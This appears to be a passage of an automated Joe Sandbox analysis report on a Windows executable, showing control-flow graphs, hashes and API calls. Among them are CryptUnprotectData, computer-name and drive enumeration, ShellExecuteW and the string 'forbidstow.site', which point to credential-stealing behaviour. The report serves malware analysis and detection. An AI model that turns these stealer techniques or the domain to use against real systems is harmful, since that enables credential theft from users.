LdrInitializeThunk 42801->42803 42803->42800 42648 431859 42651 41c2a0 42648->42651 42650 43185e CoSetProxyBlanket 42651->42650 42652 43dc18 42653 43dc1e RtlAllocateHeap 42652->42653 42804 434a7f CoSetProxyBlanket 42805 43a97e 42806 43a9a0 42805->42806 42806->42806 42807 43a9e0 SysAllocString 42806->42807 42808 43aa50 42807->42808 42808->42808 42809 43aa7d SysAllocString 42808->42809 42818 43aa9e 42809->42818 42810 43ac8a VariantClear 42817 43ac9f 42810->42817 42811 43ae0d SysFreeString SysFreeString 42811->42817 42812 43add9 SysFreeString 42825 43adf8 42812->42825 42813 43aaee VariantInit 42826 43ab40 42813->42826 42814 43adfd SysFreeString SysFreeString 42814->42811 42815 43b145 42822 443da0 LdrInitializeThunk 42815->42822 42816 43ac73 42816->42810 42818->42810 42818->42811 42818->42812 42818->42813 42818->42814 42818->42816 42818->42817 42819 43acb2 42818->42819 42818->42826 42819->42815 42819->42817 42823 43b0fe 42819->42823 42828 43ae68 42819->42828 42820 443da0 LdrInitializeThunk 42820->42815 42824 43b15b 42822->42824 42823->42820 42825->42814 42826->42810 42826->42811 42826->42812 42826->42814 42826->42816 42826->42817 42826->42819 42827 43aff2 42830 43dc40 RtlFreeHeap 42827->42830 42828->42827 42829 43aef4 42828->42829 42832 43e140 LdrInitializeThunk 42828->42832 42833 43af01 42828->42833 42835 43dfb0 LdrInitializeThunk 42828->42835 42836 43e230 LdrInitializeThunk 42829->42836 42830->42817 42832->42828 42835->42828 42836->42833 42654 42509d 42655 4250c1 42654->42655 42657 425163 42655->42657 42658 440d90 LdrInitializeThunk 42655->42658 42658->42655
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #Tw$;:54$;:54$=i<o$E0C5CB87ED97ADA1BBC9AE789563D06B$F]$J!G'$K=C#$Noni$T1S7$U`3$V[$_]$`1d7$d5h;$f[zU$forbidstow.site$xr${){/${-S
                                                                        • API String ID: 0-3206140370
                                                                        • Opcode ID: f8ab64ea4c7e8e210182be6e25d8877d480a05b41285a1b532a597eb8aa41f09
                                                                        • Instruction ID: 6273a6f89015048420069fd8e76e9716c3636ab33a276e99926261cacd246b67
                                                                        • Opcode Fuzzy Hash: f8ab64ea4c7e8e210182be6e25d8877d480a05b41285a1b532a597eb8aa41f09
                                                                        • Instruction Fuzzy Hash: 9ED243B56047408FD3248F25D88176BBBF1FF86304F18856DE5968B3A2D779E806CB86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "JZ$'Rx/$*JZ$,C$34t$ODIF$Y?^i$fjnr$kk$syrh$vNHF
                                                                        • API String ID: 0-2606108540
                                                                        • Opcode ID: f1385e0472e737411eb293167e93e2b1d896b708bed0ee908690dfc3b3201680
                                                                        • Instruction ID: 1668301a4a25afde2e4d19bd0ad22d91ff18bef6338bf9f0b8afd95663acfb5e
                                                                        • Opcode Fuzzy Hash: f1385e0472e737411eb293167e93e2b1d896b708bed0ee908690dfc3b3201680
                                                                        • Instruction Fuzzy Hash: F7131874604B908BE7358F35D4A07A3BBE1AF57304F4889AEC1EB4B386D779A409CB15
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #Tw$;:54$;:54$E0C5CB87ED97ADA1BBC9AE789563D06B$F]$Noni$T1S7$V[$_]$f[zU$forbidstow.site$xr
                                                                        • API String ID: 0-2691140226
                                                                        • Opcode ID: b0442be8fbfaddd4d400ec01b602989528da55d0bda54cb2a5bd8dac2407de0e
                                                                        • Instruction ID: 2214ddb4aa977259affe9d128b542b83af94708bdbd03a589afbbb747fa6f94c
                                                                        • Opcode Fuzzy Hash: b0442be8fbfaddd4d400ec01b602989528da55d0bda54cb2a5bd8dac2407de0e
                                                                        • Instruction Fuzzy Hash: 43C264B56047408FD3248F25D891727BBF1FF86304F1885ADE4968B7A2D77AE806CB85
                                                                        APIs
                                                                        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042F89E
                                                                        • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042F986
                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(00000000), ref: 0043009C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ComputerName$InstalledMemoryPhysicallySystem
                                                                        • String ID: "JZ$'Rx/$*JZ$,C$34t$ODIF$Y?^i$fjnr$kk$syrh$vNHF
                                                                        • API String ID: 1996838884-2606108540
                                                                        • Opcode ID: 69b1267634a027b30bf6912e36c04a49f7f474b4ea68692130fd7d15f13d2561
                                                                        • Instruction ID: 720d6aa5ae566c4ed92dd2e9e444606c90beba08f29df70a540f1b78ea5a33a4
                                                                        • Opcode Fuzzy Hash: 69b1267634a027b30bf6912e36c04a49f7f474b4ea68692130fd7d15f13d2561
                                                                        • Instruction Fuzzy Hash: C1D2D775604B818FE7258F35D4A07A3BBE1AF57304F4889AEC0EB4B782D779A409CB15

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1369 43a97e-43a993 1370 43a9a0-43a9de 1369->1370 1370->1370 1371 43a9e0-43aa4f SysAllocString 1370->1371 1372 43aa50-43aa7b 1371->1372 1372->1372 1373 43aa7d-43aaa3 SysAllocString 1372->1373 1375 43adc2-43adca 1373->1375 1376 43adc0 1373->1376 1377 43ad4b 1373->1377 1378 43ac8a-43aca4 VariantClear 1373->1378 1379 43ad4e-43ad76 call 4223f0 1373->1379 1380 43ae0d-43ae1b SysFreeString * 2 1373->1380 1381 43add1-43add8 1373->1381 1382 43ae50-43ae54 1373->1382 1383 43add9-43ade0 1373->1383 1384 43ae58 1373->1384 1385 43ac63-43ac6c 1373->1385 1386 43aba1-43abb4 1373->1386 1387 43ad20-43ad29 1373->1387 1388 43ada0-43adad 1373->1388 1389 43aaaa 1373->1389 1390 43aaee-43ab3a VariantInit 1373->1390 1391 43ac73-43ac76 1373->1391 1392 43acb2-43acba 1373->1392 1393 43aab0-43aac8 1373->1393 1394 43ac30-43ac5c 1373->1394 1395 43acb0 1373->1395 1396 43ad30 1373->1396 1397 43ad36-43ad44 1373->1397 1398 43adb4-43adbb 1373->1398 1399 43ac7f-43ac87 call 40c8c0 1373->1399 1400 43adfd-43ae0b SysFreeString * 2 1373->1400 1401 43acfd-43ad0e 1373->1401 1375->1375 1375->1376 1375->1377 1375->1379 1375->1381 1375->1382 1375->1384 1375->1387 1375->1388 1375->1396 1375->1397 1375->1398 1403 43b132-43b145 call 443da0 1375->1403 1404 43b0f2-43b0f7 1375->1404 1405 43b148-43b15b call 443da0 1375->1405 1377->1379 1378->1395 1428 43ad80-43ad88 1379->1428 1380->1382 1382->1384 1425 43ade4-43adf8 SysFreeString 1383->1425 1411 43ae5e 1384->1411 1385->1375 1385->1376 1385->1377 1385->1378 1385->1379 1385->1380 1385->1381 1385->1382 1385->1383 1385->1384 1385->1385 1385->1387 1385->1388 1385->1391 1385->1392 1385->1394 1385->1395 1385->1396 1385->1397 1385->1398 1385->1399 1385->1400 1385->1401 1407 43abb6-43abbe 1386->1407 1408 43abed-43ac1d call 40c8b0 call 42a570 1386->1408 1387->1375 1387->1376 1387->1377 1387->1379 1387->1382 1387->1384 1387->1388 1387->1396 1387->1397 1387->1398 1388->1375 1388->1376 1388->1382 1388->1384 1388->1388 1388->1398 1388->1403 1388->1404 1388->1405 1389->1393 1406 43ab40-43ab76 1390->1406 1391->1399 1392->1401 1412 43aacc-43aae7 1393->1412 1394->1375 1394->1376 1394->1377 1394->1378 1394->1379 1394->1380 1394->1381 1394->1382 1394->1383 1394->1384 1394->1385 1394->1387 1394->1388 1394->1391 1394->1392 1394->1395 1394->1396 1394->1397 1394->1398 1394->1399 1394->1400 1394->1401 1396->1397 1397->1375 1397->1376 1397->1377 1397->1379 1397->1382 1397->1384 1397->1388 1397->1398 1398->1376 1399->1378 1400->1380 1401->1375 1401->1376 1401->1377 1401->1379 1401->1381 1401->1382 1401->1384 1401->1387 1401->1388 1401->1396 1401->1397 1401->1398 1403->1405 1404->1411 1416 43b112-43b11c call 43dbb0 1404->1416 1417 43b110 1404->1417 1418 43b11f-43b129 call 43dbb0 1404->1418 1419 43b0fe-43b103 1404->1419 1420 43b0ec 1404->1420 1421 43af2c-43af46 1404->1421 1406->1406 1414 43ab78-43ab85 1406->1414 1415 43abcc-43abd0 1407->1415 1408->1375 1408->1376 1408->1377 1408->1378 1408->1379 1408->1380 1408->1381 1408->1382 1408->1383 1408->1384 1408->1385 1408->1387 1408->1388 1408->1391 1408->1392 1408->1394 1408->1395 1408->1396 1408->1397 1408->1398 1408->1399 1408->1400 1408->1401 1433 43ae60-43ae67 1411->1433 1412->1375 1412->1376 1412->1377 1412->1378 1412->1379 1412->1380 1412->1381 1412->1382 1412->1383 1412->1384 1412->1385 1412->1386 1412->1387 1412->1388 1412->1390 1412->1391 1412->1392 1412->1394 1412->1395 1412->1396 1412->1397 1412->1398 1412->1399 1412->1400 1412->1401 1438 43ab89-43ab9a 1414->1438 1434 43abd2-43abdb 1415->1434 1435 43abc0 1415->1435 1416->1418 1417->1416 1418->1403 1419->1417 1420->1404 1437 43af50-43afa3 1421->1437 1425->1400 1428->1428 1442 43ad8a-43ad94 1428->1442 1440 43abe2-43abe6 1434->1440 1441 43abdd-43abe0 1434->1441 1439 43abc1-43abca 1435->1439 1437->1437 1446 43afa5-43afb3 1437->1446 1438->1375 1438->1376 1438->1377 1438->1378 1438->1379 1438->1380 1438->1381 1438->1382 1438->1383 1438->1384 1438->1385 1438->1386 1438->1387 1438->1388 1438->1391 1438->1392 1438->1394 1438->1395 1438->1396 1438->1397 1438->1398 1438->1399 1438->1400 1438->1401 1439->1408 1439->1415 1440->1439 1448 43abe8-43abeb 1440->1448 1441->1439 1442->1375 1442->1376 1442->1382 1442->1384 1442->1388 1442->1398 1442->1403 1442->1404 1442->1405 1450 43afb5-43afbf 1446->1450 1451 43afdc-43afeb 1446->1451 1448->1439 1461 43afc0-43afcc 1450->1461 1452 43aff2-43b00f call 43dc40 1451->1452 1453 43aea2-43aeed call 43df80 call 43dfb0 1451->1453 1454 43af12 1451->1454 1455 43af10 1451->1455 1456 43ae90-43ae9b 1451->1456 1457 43aef4-43af0f call 43e230 1451->1457 1458 43ae68-43ae7a 1451->1458 1459 43af18-43af1a call 43e140 1451->1459 1460 43af1f-43af26 call 43e140 1451->1460 1473 43b010-43b065 1452->1473 1453->1454 1453->1455 1453->1456 1453->1457 1453->1459 1453->1460 1456->1452 1456->1453 1456->1454 1456->1455 1456->1456 1456->1457 1456->1459 1456->1460 1457->1455 1458->1452 1458->1453 1458->1454 1458->1455 1458->1456 1458->1457 1458->1459 1458->1460 1459->1460 1460->1421 1472 43afce 1461->1472 1472->1451 1473->1473 1475 43b067-43b06f 1473->1475 1477 43b071-43b07f 1475->1477 1478 43b0aa-43b0af 1475->1478 1479 43b080-43b08c 1477->1479 1478->1433 1481 43b08e 1479->1481 1481->1478
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID: ;:54$;:54
                                                                        • API String ID: 2525500382-2193779323
                                                                        • Opcode ID: 5a2d59dda4199b9ba7836554c8fddcc4131909e2c835070e86cdbcb1c4dc86dd
                                                                        • Instruction ID: 2cdab4973b36a2ceba13e1940af5890ec94b31d07d7f00d7a7e93af7ed3afa87
                                                                        • Opcode Fuzzy Hash: 5a2d59dda4199b9ba7836554c8fddcc4131909e2c835070e86cdbcb1c4dc86dd
                                                                        • Instruction Fuzzy Hash: 9012657AA00701DFD724CF25D880B2AB7B2FF8A300F14856DD5968B7A1D739E816CB84
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;:54$InA>$InA>$P$SV$bqB
                                                                        • API String ID: 0-3637656280
                                                                        • Opcode ID: 1fe632dc048b197257461048574386dac656c9afb9c8ab4459265dd05189564e
                                                                        • Instruction ID: efe4a20678031bc524173eeb0d2e1288ac060935f4558c6973bec6d73e9da576
                                                                        • Opcode Fuzzy Hash: 1fe632dc048b197257461048574386dac656c9afb9c8ab4459265dd05189564e
                                                                        • Instruction Fuzzy Hash: 85821475E04225CFDB04CF68DC816AEB7B2FF4A311F1981A9D941AB391D739E842CB94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1783 41d5af-41d5da call 40c8c0 call 444110 1788 41d5e1-41d60b call 40c8b0 call 4441f0 1783->1788 1789 41d620-41d634 call 403d70 1783->1789 1790 41d650 1783->1790 1791 41d652-41d66b 1783->1791 1792 41d612 1783->1792 1793 41d8b2 1783->1793 1794 41d7b5-41d7bb 1783->1794 1795 41d647-41d64f 1783->1795 1796 41d88d 1783->1796 1797 41d63e-41d644 call 40c8c0 1783->1797 1788->1789 1788->1790 1788->1791 1788->1792 1788->1793 1788->1794 1788->1795 1788->1796 1788->1797 1789->1797 1790->1791 1801 41d670-41d69d 1791->1801 1792->1789 1802 41d7c0-41d7c6 1794->1802 1795->1790 1796->1793 1797->1795 1801->1801 1807 41d69f-41d6ae 1801->1807 1802->1802 1803 41d7c8-41d7e4 1802->1803 1808 41d7e6-41d7e9 1803->1808 1809 41d7eb 1803->1809 1811 41d6b0-41d6bf 1807->1811 1812 41d6ea-41d751 call 4046d0 1807->1812 1808->1809 1814 41d7ec-41d803 1808->1814 1809->1814 1813 41d6c0-41d6c7 1811->1813 1825 41d760-41d795 1812->1825 1817 41d6d0-41d6d6 1813->1817 1818 41d6c9-41d6cc 1813->1818 1819 41d805-41d808 1814->1819 1820 41d80a 1814->1820 1817->1812 1823 41d6d8-41d6e7 call 440d90 1817->1823 1818->1813 1822 41d6ce 1818->1822 1819->1820 1824 41d80b-41d821 call 40c8b0 1819->1824 1820->1824 1822->1812 1823->1812 1832 41d827-41d886 call 4433b0 CryptUnprotectData 1824->1832 1833 41db1a-41db21 1824->1833 1825->1825 1828 41d797-41d7ae call 404810 1825->1828 1828->1793 1828->1794 1828->1796 1832->1796 1840 41dc21-41dc2b 1832->1840 1835 41db48-41db97 call 421a20 * 2 1833->1835 1847 41db99-41dbb0 call 421a20 1835->1847 1848 41db38-41db42 1835->1848 1841 41dc30-41dc39 1840->1841 1841->1841 1843 41dc3b-41dc42 1841->1843 1845 41dd58 1843->1845 1846 41dc48-41dc4d 1843->1846 1849 41dd5b-41dda8 call 40c8b0 1845->1849 1846->1849 1854 41db30-41db34 1847->1854 1855 41dbb6-41dbdf 1847->1855 1848->1832 1848->1835 1856 41ddb0-41dddb 1849->1856 1854->1848 1857 41dbe1-41dbf9 call 421a20 1855->1857 1858 41dc18-41dc1c 1855->1858 1856->1856 1859 41dddd-41dded 1856->1859 1867 41dbfb-41dc0c 1857->1867 1868 41dc0d-41dc13 1857->1868 1858->1848 1861 41de11-41de21 1859->1861 1862 41ddef-41ddf4 1859->1862 1865 41de43 1861->1865 1866 41de23-41de2f 1861->1866 1864 41de00-41de0f 1862->1864 1864->1861 1864->1864 1869 41de46-41de5b call 40d2d0 1865->1869 1870 41de30-41de3f 1866->1870 1867->1868 1868->1848 1870->1870 1871 41de41 1870->1871 1871->1869
                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041D87D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CryptDataUnprotect
                                                                        • String ID: ;:54$J$r
                                                                        • API String ID: 834300711-2889753551
                                                                        • Opcode ID: b8fbcdff2cf27d6daa97ffa3dab79fbbf3af2ef6e8a916c70c28e25c9d54df8d
                                                                        • Instruction ID: 1e6a48387384232ca1d9aaf70156626af773b6e64c63cef5257967e80691cf26
                                                                        • Opcode Fuzzy Hash: b8fbcdff2cf27d6daa97ffa3dab79fbbf3af2ef6e8a916c70c28e25c9d54df8d
                                                                        • Instruction Fuzzy Hash: 27D106B5A083409FD724CF24C8917ABB7E1EF96304F04892EE5DA87392D778D941CB96

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1902 426f82-426f8e 1903 426fe0 1902->1903 1904 426fa0-426faf 1902->1904 1905 426fb6-426fd7 1902->1905 1906 426ed5-426eec 1902->1906 1907 426fe5-426ff7 1902->1907 1903->1907 1904->1903 1904->1905 1904->1906 1904->1907 1905->1903 1906->1904 1908 4270c2-4270d5 1906->1908 1909 426f32-426f3c 1906->1909 1910 426ef3 1906->1910 1911 426f00 1906->1911 1912 426f50-426f58 1906->1912 1913 426f61-426f69 1906->1913 1914 426f06-426f2b 1906->1914 1915 4270f7-427108 1906->1915 1916 426ef9 1906->1916 1917 4270af-4270bb 1906->1917 1918 427000-427024 1907->1918 1908->1915 1919 427162-42716c 1908->1919 1920 4270e0-4270f0 1908->1920 1921 427160 1908->1921 1922 427250-427259 1908->1922 1923 427111-42712a 1908->1923 1924 427131-427138 1908->1924 1925 42713a-42714f 1908->1925 1926 42725b-4272b2 1908->1926 1927 42710f 1908->1927 1928 42748f-427495 1908->1928 1909->1903 1909->1905 1909->1906 1909->1907 1909->1912 1910->1916 1911->1914 1912->1913 1913->1904 1914->1904 1914->1909 1914->1912 1914->1913 1915->1919 1915->1921 1915->1922 1915->1923 1915->1924 1915->1925 1915->1926 1915->1927 1915->1928 1916->1911 1917->1904 1917->1908 1917->1909 1917->1911 1917->1912 1917->1913 1917->1914 1917->1915 1917->1916 1918->1918 1929 427026-42702e 1918->1929 1920->1915 1920->1919 1920->1921 1920->1922 1920->1923 1920->1924 1920->1925 1920->1926 1920->1927 1920->1928 1922->1926 1923->1919 1923->1921 1923->1922 1923->1924 1923->1925 1923->1926 1923->1928 1943 427152-427157 1924->1943 1925->1943 1930 4272c0-4272f5 1926->1930 1927->1923 1937 42749e-4274a6 1928->1937 1931 427034-427042 1929->1931 1932 426ecf 1929->1932 1930->1930 1933 4272f7-42733a 1930->1933 1934 427050-427057 1931->1934 1938 426ed2 1932->1938 1950 427343 1933->1950 1951 42733c-427341 1933->1951 1941 427063-427069 1934->1941 1942 427059-42705c 1934->1942 1944 4274a8-4274ad 1937->1944 1945 4274af 1937->1945 1938->1906 1941->1938 1948 42706f-4270a8 call 440d90 1941->1948 1942->1934 1947 42705e 1942->1947 1943->1921 1949 4274b6-427555 call 40c8b0 1944->1949 1945->1949 1947->1938 1948->1904 1948->1908 1948->1909 1948->1910 1948->1911 1948->1912 1948->1913 1948->1914 1948->1915 1948->1916 1948->1917 1957 427560-427595 1949->1957 1955 427346-42736b call 40c8b0 1950->1955 1951->1955 1969 427374-4273ba call 40c8b0 1955->1969 1970 42736d 1955->1970 1957->1957 1959 427597-4275a3 1957->1959 1961 4275c1-4275d5 1959->1961 1962 4275a5-4275af 1959->1962 1964 4275f1-42760f GetLogicalDrives call 443f40 1961->1964 1965 4275d7-4275da 1961->1965 1963 4275b0-4275bf 1962->1963 1963->1961 1963->1963 1973 427616-42761e 1964->1973 1974 42786b 1964->1974 1967 4275e0-4275ef 1965->1967 1967->1964 1967->1967 1976 4273c0-427407 1969->1976 1970->1969 1973->1974 1977 42786d 1974->1977 1976->1976 1978 427409-427417 1976->1978 1977->1977 1979 427441-42744d 1978->1979 1980 427419-427421 1978->1980 1982 427471-42747b call 443f40 1979->1982 1983 42744f-427452 1979->1983 1981 427430-42743f 1980->1981 1981->1979 1981->1981 1986 427480-427488 1982->1986 1984 427460-42746f 1983->1984 1984->1982 1984->1984 1986->1928 1986->1937
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;:54$bqB
                                                                        • API String ID: 0-2071309610
                                                                        • Opcode ID: 263537fe2a8df3ec3f14dcc44ec227b89241fc27fa4e8899ccdf581fb29b93dd
                                                                        • Instruction ID: fa4f063e5c1a2739215ee5b4adf56ea63b9745041435cfc788aeb297095a9e3c
                                                                        • Opcode Fuzzy Hash: 263537fe2a8df3ec3f14dcc44ec227b89241fc27fa4e8899ccdf581fb29b93dd
                                                                        • Instruction Fuzzy Hash: 6BF144B6E01215CFDB04CF68C8817AEB7B2FF89305F298169D905AB391D779D902CB94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1987 4359b7-435a98 call 41c2a0 GetSystemMetrics * 2 1995 435a9f-435b30 1987->1995
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 4116985748-3916222277
                                                                        • Opcode ID: 7ebe9ada2b944e2a605cbf6a1b9a2adb3c02393c48b07d7d3b47b36bb3546d83
                                                                        • Instruction ID: af170d9abb170c5f9c5b4b0cc02af21999a26d1706b44f637ddae32c9d32eadc
                                                                        • Opcode Fuzzy Hash: 7ebe9ada2b944e2a605cbf6a1b9a2adb3c02393c48b07d7d3b47b36bb3546d83
                                                                        • Instruction Fuzzy Hash: 275180B4E142048FCB40EFACD98169DBBF0BB49300F10856EE898E7350DB74A945CF96
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(004440E0,005C003F,00000002,00000018,?), ref: 00440DBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 03a99d87a2b41afe7c87664c657482e911ea18831468bda48fd0c6a37a8fb2b2
                                                                        • Instruction ID: 3fa07f6db641d71a0473f50ea65704cafb772fe890b3affdcce6dfd07b14b487
                                                                        • Opcode Fuzzy Hash: 03a99d87a2b41afe7c87664c657482e911ea18831468bda48fd0c6a37a8fb2b2
                                                                        • Instruction Fuzzy Hash: 26414636704300AFE7148B599CC1B3B77A6AFD9B04F19402EEA815B7A1D6B5EC048789
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4c50a3ff0d1de7391cf4100277f546ca23f53629a5a530595b00d458c2c75fd9
                                                                        • Instruction ID: 8c003f9823dd69ea712ad3b12e21b48027cbc909d67c67ab34576fa10d6e70ee
                                                                        • Opcode Fuzzy Hash: 4c50a3ff0d1de7391cf4100277f546ca23f53629a5a530595b00d458c2c75fd9
                                                                        • Instruction Fuzzy Hash: B8212B796083109FE3149F1884D057773A1EB9B329F15163ED592573B2C338AC85DB5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c8d17ee3c5b0249c4511545cef8028621f6b40edad453890fbf9e24c95996764
                                                                        • Instruction ID: f199c747c52a9adc49da1807b431ea695ec0528af7265f3209bd91b7ed0bd343
                                                                        • Opcode Fuzzy Hash: c8d17ee3c5b0249c4511545cef8028621f6b40edad453890fbf9e24c95996764
                                                                        • Instruction Fuzzy Hash: 1801D6386142409BE758DF25D8D18377352E79B358F24193ED193872B1C334A845CB1E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1755 40d0b0-40d0bf 1756 40d0c0-40d0d2 1755->1756 1756->1756 1757 40d0d4-40d0de call 43fad0 1756->1757 1760 40d0e4-40d0eb call 437d30 1757->1760 1761 40d277-40d279 ExitProcess 1757->1761 1764 40d0f1-40d17e GetCurrentThreadId 1760->1764 1765 40d272 call 440ca0 1760->1765 1766 40d180-40d192 1764->1766 1765->1761 1766->1766 1768 40d194-40d197 1766->1768 1769 40d19d-40d1da 1768->1769 1770 40d24f-40d257 GetForegroundWindow 1768->1770 1771 40d1e0-40d1f2 1769->1771 1772 40d259 GetCurrentProcessId 1770->1772 1773 40d25f-40d266 call 40e1c0 1770->1773 1771->1771 1774 40d1f4-40d213 1771->1774 1772->1773 1773->1765 1779 40d268 call 4107e0 1773->1779 1776 40d220-40d234 1774->1776 1776->1776 1778 40d236-40d249 ShellExecuteW 1776->1778 1778->1770 1781 40d26d call 40f960 1779->1781 1781->1765
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040D165
                                                                        • ShellExecuteW.SHELL32(00000000,81368735,00448050,?,00000000,00000005), ref: 0040D249
                                                                        • GetForegroundWindow.USER32(?,00000000,00000005), ref: 0040D24F
                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0040D259
                                                                        • ExitProcess.KERNEL32 ref: 0040D279
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentProcess$ExecuteExitForegroundShellThreadWindow
                                                                        • String ID: ps
                                                                        • API String ID: 1013327911-2817149839
                                                                        • Opcode ID: 395947aa4596a6fdbf01b6e5e31911d6bd80a891b54674111b2221b4422230a7
                                                                        • Instruction ID: 802e53b9b5d3fab858b8c0f51e2b6f1987ae4d254ae5757ddd4a7fa400bb7844
                                                                        • Opcode Fuzzy Hash: 395947aa4596a6fdbf01b6e5e31911d6bd80a891b54674111b2221b4422230a7
                                                                        • Instruction Fuzzy Hash: D14108316183408BE714AB75981536FBBD69FC6314F158D2EE4C1EB2D2CE78C40A8B5A

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
